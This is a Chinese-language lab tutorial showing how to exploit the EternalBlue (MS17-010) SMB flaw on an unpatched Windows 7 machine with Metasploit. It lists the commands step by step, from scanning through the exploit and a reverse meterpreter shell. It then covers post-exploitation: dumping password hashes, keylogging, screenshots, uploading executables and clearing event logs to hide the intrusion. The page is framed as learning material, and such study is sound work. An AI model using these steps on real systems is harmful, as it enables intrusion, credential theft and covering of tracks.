Metaploit-永恆之藍漏洞利用


目錄

  1. Metaploit介紹
  2. 實驗環境
  3. 漏洞利用過程

 Metaploit介紹

  本次測試主要是利用永恆之藍漏洞對windows7進行控制利用,掌握Metaploit工具的使用,知道永恆之藍的漏洞利用原理。永恆之藍是在Windows的SMB服務處理SMB v1請求時發生的漏洞,這個漏洞導致攻擊者在目標系統上可以執行任意代碼。通過永恆之藍漏洞會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。

  進入metaploit命令:msfconsole,可以看出下面有總共有六個模塊,輔助模塊(auxiliary)、滲透攻擊模塊(exploits)、后滲透攻擊模塊(post)、攻擊載荷模塊(payloads)、空指令模塊(nops)、編碼器模塊(encoders),其中msf為總模塊,其他均為分支模塊。


 實驗環境

攻擊機192.168.202.132  (Kali安裝Metaploit工具)

靶機192.168.202.131 windows7x64未打永恆之藍補丁且關閉防火牆)


 實戰漏洞利用

1.進入metaploit工具使用命令:msfconsole,可以看出下面有總共有六個模塊,不同的模塊功能使用的側重點一樣,在進行不同的探測之前使用不同的模塊。

輔助模塊(auxiliary)、滲透攻擊模塊(exploits)、后滲透攻擊模塊(post)、攻擊載荷模塊(payloads)、空指令模塊(nops)、編碼器模塊(encoders),其中msf為總模塊,其他均為分支模塊。Metaploit的版本號為metasploit v4.17.3-dev

>>>msfconsole

 

2.在進行攻擊利用之前,首先確實目標是否開放445端口,該漏洞Ms17-010是否存在,先做好簡單的信息收集更能成功利用目標主機。

nmap探測主機信息

>>>nmap   -sV   192.168.202.131

====>>>445端口開放,目的主機為windows7系統,推測存在ms17-010漏洞

 

利用msf的auxiliary模塊進行漏洞驗證

>>>search ms17-010

搜索有關漏洞的模塊,結果看到很多有關該漏洞的不同模塊,可以使用auxiliary/scanner/smb/smb_ms17_010 進行驗證

>>>use  auxiliary/scanner/smb/smb_ms17_010

>>>set  rhost  192.168.202.131

>>>set  rport   445

 

配置好之后,使用>>>run 探測一下查看結果存在該漏洞

 

3.驗證存在漏洞之后,就可以利用永恆之藍漏洞,使用其中的滲透攻擊(exploit)模塊,對其進行滲透攻擊

a.設置攻擊目標、端口、本機

>>>use  exploit/windows/smb/ms17_010_eternalblue

b.使用exp進行攻擊時,要使用payload作為子彈進行攻擊

>>>set  payload   windows/x64/meterpreter/reverse_tcp

c.查看具體配置是否完整

>>>show options 

d.進行攻擊

>>>run

 

soga  進去了,看樣子差不多可以嘿嘿嘿了*-*

 

4.進入shell,獲取命令行,可以看到直接獲得system權限 

meterpreter是metasploit框架中的一個擴展模塊,作為溢出成功后的攻擊載荷使用,攻擊載荷在溢出攻擊成功以后給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個meterpreter shell的鏈接。

a.從上面看出已經攻入成功,可以輸入:sysinfo查看系統信息

meterpreter > sysinfo

 

b.反彈shell

meterpreter >shell

meterpreter shell作為滲透模塊有很多有用的功能,比如:添加一個用戶、隱藏一些東西、打開shell、得到用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、得到遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。另外meterpreter能夠躲避入侵檢測系統。在遠程主機上隱藏自己,它不改變系統硬盤中的文件,因此HIDS(基於主機的入侵檢測系統) 很難對它做出響應。此外它在運行的時候系統時間是變化的,所以跟蹤它或者終止它對於一個有經驗的人也會變得非常困難。

 

5.shell利用

(1).新建用戶、獲得用戶密碼

a.密碼為進入hash加密值,可以利用在線解密進行破解

meterpreter > hashdump

可以看到用戶名,密碼,hash解碼就可以拿到密碼了

b.進入shell新建用戶

 

c. 捕捉屏幕:screenhot

 

到這個路徑下查看,可以看到返回的圖片

 

 d.獲取按鍵信息

開始獲取:keyscan_start

下載內容:keyscan_dump

 

沒有獲取到,應該需要在捕獲的同時需要進行鍵盤操作

 

e.上傳文件

“upload”命令為上傳文件到靶機下(例如黑客上傳一個勒索病毒WannaCry),測試上傳了一個hack.exe文件到,可以直接執行

 

f. 清除事件日志

執行“clearev”命令,將清除事件日志。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM